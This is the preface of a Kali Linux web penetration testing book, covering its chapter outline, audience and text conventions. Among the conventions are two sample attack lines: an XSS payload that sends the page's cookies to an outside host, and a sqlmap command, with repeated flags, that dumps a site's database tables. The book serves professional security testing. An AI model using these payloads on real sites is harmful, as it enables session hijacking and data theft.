Kali is a Debian Linux based Penetration Testing arsenal used by security professionals (and others) to perform security assessments. Kali offers a range of toolsets customized for identifying and exploiting vulnerabilities in systems. This book is written leveraging tools available in Kali Linux released March 13th, 2013 as well as other open source applications.
Web Penetration Testing with Kali Linux is designed to be a guide for professional Penetration Testers looking to include Kali in a web application penetration engagement. Our goal is to identify the best Kali tool(s) for a specific assignment, provide details on using the application(s), and offer examples of what information could be obtained for reporting purposes based on expert field experience. Kali has various programs and utilities; however, this book will focus on the strongest tool(s) for a specific task at the time of publishing.
The chapters in this book are divided into tasks used in real world web application Penetration Testing. Chapter 1, Penetration Testing and Setup, provides an overview of Penetration Testing basic concepts, professional service strategies, background on the Kali Linux environment, and setting up Kali for topics presented in this book. Chapters 2-6, cover various web application Penetration Testing concepts including configuration and reporting examples designed to highlight if topics covered can accomplish your desired objective.
Chapter 7, Defensive Countermeasures, serves as a remediation source on systems vulnerable to attacks presented in previous chapters. Chapter 8, Penetration Test Executive Report, offers reporting best practices and samples that can serve as templates for building executive level reports. The purpose of designing the book in this fashion is to give the reader a guide for engaging a web application penetration with the best possible tool(s) available in Kali, offer steps to remediate a vulnerability and provide how data captured could be presented in a professional manner.
Chapter 1, Penetration Testing and Setup, covers fundamentals of building a professional Penetration Testing practice. Topics include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This chapter also provides steps used to set up a Kali Linux environment for tasks covered in this book.
Chapter 2, Reconnaissance, provides various ways to gather information about a target. Topics include highlighting popular free tools available on the Internet as well as Information Gathering utilities available in Kali Linux.
Chapter 3, Server Side Attacks, focuses on identifying and exploiting vulnerabilities in web servers and applications. Tools covered are available in Kali or other open source utilities.
Chapter 4, Client Side Attacks, targets hosts systems. Topics include social engineering, exploiting host system vulnerabilities, and attacking passwords, as they are the most common means to secure host systems.
Chapter 5, Attacking Authentication, looks at how users and devices authenticate to web applications. Topics include targeting the process of managing authentication sessions, compromising how data is stored on host systems, and man-in-the-middle attack techniques. This chapter also briefly touches on SQL and Cross-Site Scripting attacks.
Chapter 6, Web Attacks, explores how to take advantage of web servers and compromise web applications using exploits such as browser exploitation, proxy attacks, and password harvesting. This chapter also covers methods to interrupt services using denial of service techniques.
Chapter 7, Defensive Countermeasures, provides best practices for hardening your web applications and servers. Topics include security baselines, patch management, password policies, and defending against attack methods covered in previous chapters. This chapter also includes a focused forensics section, as it is important to properly investigate a compromised asset to avoid additional negative impact.
Chapter 8, Penetration Test Executive Report, covers best practices for developing professional post Penetration Testing service reports. Topics include an overview of methods to add value to your deliverable, document formatting, and templates that can be used to build professional reports.
Readers should have a basic understanding of web applications, networking concepts, and Penetration Testing methodology. This book will include detailed examples of how to execute an attack using tools offered in Kali Linux as well as other open source applications. It is not required but beneficial to have experience using previous versions of Backtrack or similar programs.
Hardware requirements for building a lab environment and setting up the Kali Linux arsenal are covered in Chapter 1, Penetration Testing and Setup.
The target audience for this book are professional Penetration Testers or others looking to maximize Kali Linux for a web server or application Penetration Testing exercise. If you are looking to identify how to perform a Penetration Test against web applications and present findings to a customer is a professional manner then this book is for you.
In this book, you will find a number of styles of text that distinguish between different kinds of information. Here are some examples of these styles, and an explanation of their meaning.
Code words in text are shown as follows: " For example, you can call the profile My First Scan or anything else you would like."
A block of code is set as follows:
<script>document.write("<img src='http://kali.drchaos.com/var/www/xss_lab/lab_script.php?"+document.cookie+"'>")</script>Any command-line input or output is written as follows:
sqlmap -u http://www.drchaous.com/article.php?id=5 -T tablesnamehere -U test --dump -U test –dump
New terms and important words are shown in bold. Words that you see on the screen, in menus or dialog boxes for example, appear in the text like this: "Soon as we click on the Execute button, we receive a SQL injection".
Feedback from our readers is always welcome. Let us know what you think about this book—what you liked or may have disliked. Reader feedback is important for us to develop titles that you really get the most out of.
To send us general feedback, simply send an e-mail to <[email protected]>, and mention the book title via the subject of your message.
If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide on www.packtpub.com/authors.
Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.
Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books—maybe a mistake in the text or the code—we would be grateful if you would report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the errata submission form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded on our website, or added to any list of existing errata, under the Errata section of that title. Any existing errata can be viewed by selecting your title from http://www.packtpub.com/support.
Piracy of copyright material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works, in any form, on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.
Please contact us at <[email protected]> with a link to the suspected pirated material.
We appreciate your help in protecting our authors, and our ability to bring you valuable content.
You can contact us at <[email protected]> if you are having a problem with any aspect of the book, and we will do our best to address it.